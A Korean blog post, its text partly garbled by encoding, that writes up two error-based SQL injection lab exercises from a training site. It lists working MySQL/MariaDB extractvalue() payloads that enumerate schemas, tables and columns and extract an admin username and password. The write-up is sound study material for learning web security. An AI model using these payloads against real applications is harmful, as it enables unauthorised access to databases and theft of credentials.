๐ŸŒ†โ”‚Web_Study/๐ŸฅŠโ”‚pentestgym

SQLi WriteUp

Jastes 2023. 7. 12. 19:29

 

SQL ์ธ์ ์…˜ ๊ธฐ์ดˆ

๐Ÿ’กํ•ด๋‹น ๋‚ด์šฉ์€ pentestqym์˜ ๋‚ด์šฉ์„ ๋‹ค์‹œ ํ•œ ๋ฒˆ ์ •๋ฆฌํ•œ ๋‚ด์šฉ์ด๋ฉฐ, ๋ชจ๋“  ์ €์ž‘๊ถŒ์€ ํ•ด๋‹น ์‚ฌ์ดํŠธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฒˆ์—๋Š” SQL Injection์ด ๋ญ”์ง€์™€ ์–ด๋–ป๊ฒŒ ์ด๋ฃจ์–ด์ง€๋Š”์ง€ ์•Œ์•„๋ด…์‹œ๋‹ค. SQL Injection? SQL Injection

dystopia050119.tistory.com

Error-base SQLi WriteUp

 Error-based SQLi์„ ์ง์ ‘ ์‹ค์Šตํ•ด ๋ด…์‹œ๋‹ค. ๋ณธ ํ›ˆ๋ จ์˜ ์ƒ๋‹จ์— ์žˆ๋Š” ์‹ค์Šต ํ™˜๊ฒฝ์„ ์ƒ์„ฑํ•˜์—ฌ ์˜ค๋ฅ˜ ๊ธฐ๋ฐ˜ SQLi์„ ์ง์ ‘ ํ…Œ์ŠคํŠธํ•˜๊ณ  ๋ฏธ์…˜์„ ํ•ด๊ฒฐํ•ด ๋ณด์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๋จผ์ € ์ฐธ๊ณ ํ•˜๋ฉด ์ข‹์€ ์ž๋ฃŒ์ž…๋‹ˆ๋‹ค.

 

Error ๊ธฐ๋ฐ˜ SQL ์ธ์ ์…˜

๐Ÿ’กํ•ด๋‹น ๋‚ด์šฉ์€ pentestqym์˜ ๋‚ด์šฉ์„ ๋‹ค์‹œ ํ•œ ๋ฒˆ ์ •๋ฆฌํ•œ ๋‚ด์šฉ์ด๋ฉฐ, ๋ชจ๋“  ์ €์ž‘๊ถŒ์€ ํ•ด๋‹น ์‚ฌ์ดํŠธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ์˜ค๋ฅ˜๊ธฐ๋ฐ˜ SQLi์— ๋Œ€ํ•˜์—ฌ ๋ฐฐ์›Œ๋ด…์‹œ๋‹ค. Error based SQLi ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์˜ค๋ฅ˜ ๋ฉ”์‹œ์ง€๋ฅผ ํ™œ์šฉํ•˜

dystopia050119.tistory.com

Exercise 1. 

์ด ๋ฌธ์ œ๋Š” ๋งค๊ฐœ๋ณ€์ˆ˜๊ฐ€ WHERE์ ˆ์— ์‚ฌ์šฉ๋œ ๋ฌธ์ž์—ด ํƒ€์ž…์˜ ์ปฌ๋Ÿผ๊ณผ ์—ฐ๊ฒฐ๋ฉ๋‹ˆ๋‹ค.

๋”๋ณด๊ธฐ

 

1. ๋จผ์ € URL์„ ํ™•์ธํ•จ(GET ๋ฐฉ์‹์œผ๋กœ ์ธ์ž ์ „๋‹ฌ) ๊ทธ ํ›„ DB ํ”„๋ ˆ์ž„์›Œํฌ ํ™•์ธ

- ๊ทธ ํ›„ ํ™€๋”ฐ์˜ดํ‘œ(๋‹ค๋ฅธ๊ฑธ๋กœ ํ•ด๋„ ๋จ)๋กœ SQLi๊ฐ€ ๋˜๋Š”์ง€ ํ™•์ธ

http://๊ฐ€์ƒ์˜ ip์˜ ์ฃผ์†Œ/sqli_err_ex1.php?name=Faye%20Valentine%27
GET ๋ฐฉ์‹์œผ๋กœ ์š”์ฒญํ•œ ๋ถ€๋ถ„ ํ™•์ธ(์ฟผ๋ฆฌ๋กœ DB SELECT ํ›„ ์ถ”์ถœํ•œ๋“ฏ)
๋˜๋Š” ๋ชจ์Šต

์•„ ์ฐธ๊ณ ๋กœ ์—ฌ๊ธฐ์—๋Š” ์ด๋ฏธ์ง€๋ฅผ ์•ˆ ์˜ฌ๋ ธ๋Š”๋ฐ ํŽ˜์ด์ง€ ์†Œ์Šค๋ฅผ ๋ณด๋‹ค ๋ณด๋ฉด ์ฃผ์„์œผ๋กœ ๊ณต๊ฒฉ ์œ ํ˜•๊ณผ ํ•„ํ„ฐ์˜ ์œ ๋ฌด๋ฅผ ์•Œ๋ ค์ฃผ๋„ค์š” ใ…Žใ…Ž

์˜ค๋ฅ˜ ํ™•์ธ DB : MariaDB(Mysql)
 

MySQL :: MySQL 8.0 Reference Manual :: 26.3.31 The INFORMATION_SCHEMA SCHEMATA Table

26.3.31 The INFORMATION_SCHEMA SCHEMATA Table A schema is a database, so the SCHEMATA table provides information about databases. The SCHEMATA table has these columns: CATALOG_NAME The name of the catalog to which the schema belongs. This value is always

dev.mysql.com

 

MySQL :: MySQL 8.0 Reference Manual :: 26.8 Extensions to SHOW Statements

26.8 Extensions to SHOW Statements Some extensions to SHOW statements accompany the implementation of INFORMATION_SCHEMA: SHOW can be used to get information about the structure of INFORMATION_SCHEMA itself. Several SHOW statements accept a WHERE clause t

dev.mysql.com

์œ„ ๊ณต์‹ ๋ฌธ์„œ์˜ ์ž๋ฃŒ๋ฅผ ํ†ตํ•ด ์ฐธ๊ณ ํ•˜์—ฌ ์‚ดํŽด๋ด…์‹œ๋‹ค.

2. ์‚ฌ์šฉ ์ค‘์ธ DB๋ช… ํ™•์ธ & ํ…Œ์ด๋ธ”๋ช…

์‚ฌ์šฉ ์ค‘์ธ DB ํ”„๋ ˆ์ž„์›Œํฌ๋Š” ์œ„์—์„œ ํ™•์ธํ–ˆ์ฃ ? ๋ฐ”๋กœ DB๋ช…์„ ํ™•์ธํ•ฉ์‹œ๋‹ค. 

%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, schema_name) FROM information_schema.schemata LIMIT 3,1)))-- -

์ฐธ๊ณ ๋กœ concat์€ ์‚ฌ์šฉ ์•ˆ ํ•ด๋„ ๋˜๊ธด ํ•ด์š”(์—ฌ๊ธฐ์„  ์™œ ๊ณ„์† ์“ฐ๋ผ๊ณ  ํ• ๊นŒ์š”?)

๋˜ํ•œ extractvalue()๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์ด์œ ๋Š” ํ™”๋ฉด์— ๋„์šฐ๊ธฐ ์œ„ํ•จ(๋‹จ ํ•œ ์ปฌ๋Ÿผ๋ฐ–์—(์ค„) ๋ชป ๋„์›€)

 ํ•ด๋‹น ๊ฒฐ๊ณผ๊ฐ€ ๋‚˜์˜ค๋Š” ์ด์œ ๋Š” ํ•ด๋‹น information_schema.schemata(Mysql, MariaDB์˜ ์ •๋ณด; ์ œ์•ฝ์กฐ๊ฑด ๋“ฑ)์„ ๋‹ด์•„๋‘๋Š” ๋ฉ”ํƒ€๋ฐ์ด์—์„œ ํ•ด๋‹น์ •๋ณด์˜ ์ปฌ๋Ÿผ์„ ์ฐพ๋Š” ๊ณผ์ •์ž…๋‹ˆ๋‹ค. 

 

MySQL :: MySQL 8.0 Reference Manual :: 26.1 Introduction

INFORMATION_SCHEMA provides access to database metadata, information about the MySQL server such as the name of a database or table, the data type of a column, or access privileges. Other terms that are sometimes used for this information are data dictiona

dev.mysql.com

์œ„ ์ž๋ฃŒ๋ฅผ ์ฐธ๊ณ ํ•˜์—ฌ ํ’€์–ด๋ด…์‹œ๋‹ค.

3. ํ…Œ์ด๋ธ”์„ ์—ด๊ฑฐํ•จ
%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, table_name) FROM information_schema.tables WHERE table_schema='mydb' LIMIT 3,1)))-- -

ํ•ด๋‹น ์‚ฌ์šฉ์ž์˜ ๋ฐ์ดํ„ฐ๋ฅผ ๊ฐ–๊ณ  ์žˆ๋Š” DB(users)์˜ ์ •๋ณด๋ฅผ ์–ป์—ˆ์œผ๋‹ˆ ๋‹ค์Œ๋‹จ๊ณ„๋กœ ใ„ฑ

4. ์‚ฌ์šฉ์ž ๊ณ„์ •(ID)๊ณผ ๋น„๋ฒˆ ์ปฌ๋Ÿผ ํ™•์ธํ•˜๊ธฐ
/* Username columns */
%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.columns WHERE table_name='users' LIMIT 5,1)))-- -

/* Password columns */
%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='users' LIMIT 6,1)))-- -
5. admin password crack

ํ…Œ์ด๋ธ”๋ช…๊ณผ ๊ตฌ์กฐ ๊ทธ๋ฆฌ๊ณ  ๊ฐ ์ปฌ๋Ÿผ์˜ ์ •๋ณด๋ฅผ ์•Œ์•˜์œผ๋ฏ€๋กœ ๋ฐ”๋กœ ๋น„๋ฒˆ์„ ์ถ”์ถœํ•ฉ์‹œ๋‹ค.

%27 AND extractvalue(rand(), concat(0x3a, (SELECT concat(user_name, 0x3a, password) FROM users LIMIT 0,1)))-- -
pass!!

๊ฒฐ๋ก ์ ์œผ๋กœ ๊ฒฐ๊ณผ๊ฐ€ ๋‚˜์™”๊ตฐ์š”

ID : Administrator(admin)
PW : pass

 

Exercise 2.

 ์ด ๋ฌธ์ œ๋Š” ๋งค๊ฐœ๋ณ€์ˆ˜ ๊ฐ’์— ํ™‘๋”ฐ์˜ดํ‘œ(')๋ฅผ ์ œ์ถœํ•˜๋ฉด DB ๊ตฌ๋ฌธ ์˜ค๋ฅ˜ ๋ฉ”์‹œ์ง€๋ฅผ ํ‘œ์‹œํ•˜์ง€๋งŒ ๋ฌธ์ œ 1๊ณผ ๋™์ผํ•œ ๋ฐฉ๋ฒ•์„ ์ด์šฉํ•˜๋ฉด ์›ํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ์ถ”์ถœํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค. ์ด ๋ฌธ์ œ๋Š” ๋งค๊ฐœ๋ณ€์ˆ˜๊ฐ€ DB์˜ ์ˆซ์ž ํƒ€์ž… ์ปฌ๋Ÿผ๊ณผ ์—ฐ๊ฒฐ๋˜์–ด ์žˆ์Œ์„ ์œ ์˜ํ•˜์„ธ์š”. 

๋”๋ณด๊ธฐ
1. ๋จผ์ € URL์„ ํ™•์ธํ•จ(GET ๋ฐฉ์‹์œผ๋กœ ์ธ์ž ์ „๋‹ฌ) ๊ทธ ํ›„ DB ํ”„๋ ˆ์ž„์›Œํฌ ํ™•์ธ

- ๊ทธ ํ›„ ํ™€๋”ฐ์˜ดํ‘œ(๋‹ค๋ฅธ ๊ฑธ๋กœ ํ•ด๋„ ๋จ)๋กœ SQLi๊ฐ€ ๋˜๋Š”์ง€ ํ™•์ธ

http://๊ฐ€์ƒ์˜ ip์˜ ์ฃผ์†Œ/sqli_err_ex2.php?emp_no=1%2B2

๋ฅผ ํ•œ๋‹ค๋ฉด ์ฒ˜์Œ 2๋ฒˆ์งธ ๋ฌธ์ œ๋ฅผ ๋“ค์–ด๊ฐˆ ๋•Œ์ฒ˜๋Ÿผ ์ •์ƒ์ ์œผ๋กœ ๋‚˜์˜ค๋ฏ€๋กœ SQLi๊ฐ€ ๊ฐ€๋Šฅํ•ด์ง‘๋‹ˆ๋‹ค. ์ฐธ๊ณ ๋กœ %2B๋Š” +์ด๋ฉฐ, ์ €๋ ‡๊ฒŒ URL incode ๊ฐ€ ์•ฝ๊ฐ„ ๊ท€์ฐฎ๋‹ค๋ฉด -๋ฅผ ๊ทธ๋ƒฅ ์“ฐ์…”๋„ ๋ผ์š”

2. ์‚ฌ์šฉ ์ค‘์ธ DB๋ช… ํ™•์ธ & ํ…Œ์ด๋ธ”๋ช…

 ์‚ฌ์šฉ ์ค‘์ธ DB ํ”„๋ ˆ์ž„์›Œํฌ๋Š” ์œ„์—์„œ ํ™•์ธํ–ˆ์ฃ ? ๋ฐ”๋กœ DB๋ช…์„ ํ™•์ธํ•ฉ์‹œ๋‹ค. ์œ„์—์„œ ํ–ˆ๋˜ ๋‚ด์šฉ์ด๋ž‘ ํฌ๊ฒŒ ๋‹ฌ๋ผ์ง„ ๋ณดํ˜ธ ๊ธฐ๋ฒ•์ด๋‚˜ DB๊ฐ€ ๋ณ€๊ฒฝ๋˜์ง„ ์•Š์•„์„œ ์ฝ”๋“œ๋งŒ ๋ณด์—ฌ์ฃผ๊ณ  ๋๋‚ด๋„๋ก ํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค.

 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, schema_name) FROM information_schema.schemata LIMIT 3,1)))-- -
3. ํ…Œ์ด๋ธ”์„ ์—ด๊ฑฐํ•จ
 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, table_name) FROM information_schema.tables WHERE table_schema='mydb' LIMIT 3,1)))-- -
4. ์‚ฌ์šฉ์ž ๊ณ„์ •(ID)๊ณผ ๋น„๋ฒˆ ์ปฌ๋Ÿผ ํ™•์ธํ•˜๊ธฐ
/* Username columns */
 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.columns WHERE table_name='users' LIMIT 5,1)))-- -

/* Password columns */
 AND extractvalue(rand(), concat(0x3a, (SELECT concat(0x3a, column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='users' LIMIT 6,1)))-- -
5. admin password crack

ํ…Œ์ด๋ธ”๋ช…๊ณผ ๊ตฌ์กฐ ๊ทธ๋ฆฌ๊ณ  ๊ฐ ์ปฌ๋Ÿผ์˜ ์ •๋ณด๋ฅผ ์•Œ์•˜์œผ๋ฏ€๋กœ ๋ฐ”๋กœ ๋น„๋ฒˆ์„ ์ถ”์ถœํ•ฉ์‹œ๋‹ค.

 AND extractvalue(rand(), concat(0x3a, (SELECT concat(user_name, 0x3a, password) FROM users LIMIT 0,1)))-- -

๊ฒฐ๊ณผ๋ž‘ ์ ‘๊ทผ ๋ฐฉ์‹๋„.. ์ •ํ™•ํ•˜๊ฒŒ ๋˜‘๊ฐ™๋„ค์š”.. Python์œผ๋กœ ์ต์Šค ์ฝ”๋“œ๋ฅผ ์ž‘์„ฑํ• ๊นŒ.. ์ƒ๊ฐํ•ด๋ดค๋Š”๋ฐ ๋‚˜์ค‘์— ํ• ๊ป˜

 

์•„์ง ๋ฏธ์™„์„ฑ์ด๊ธฐ๋„ ํ•˜๊ณ  ์›๋ž˜ ์ง€๊ธˆ ์˜ฌ๋ฆด ์ƒ๊ฐ์€ ์—†์—ˆ๋Š”๋ฐ.. ์˜ค๋Š˜์€ ๋‚ ๋จนํ• ๊ป˜์š” ใ…Žใ…Ž..

์ €์ž‘์žํ‘œ์‹œ ๋น„์˜๋ฆฌ ๋ณ€๊ฒฝ๊ธˆ์ง€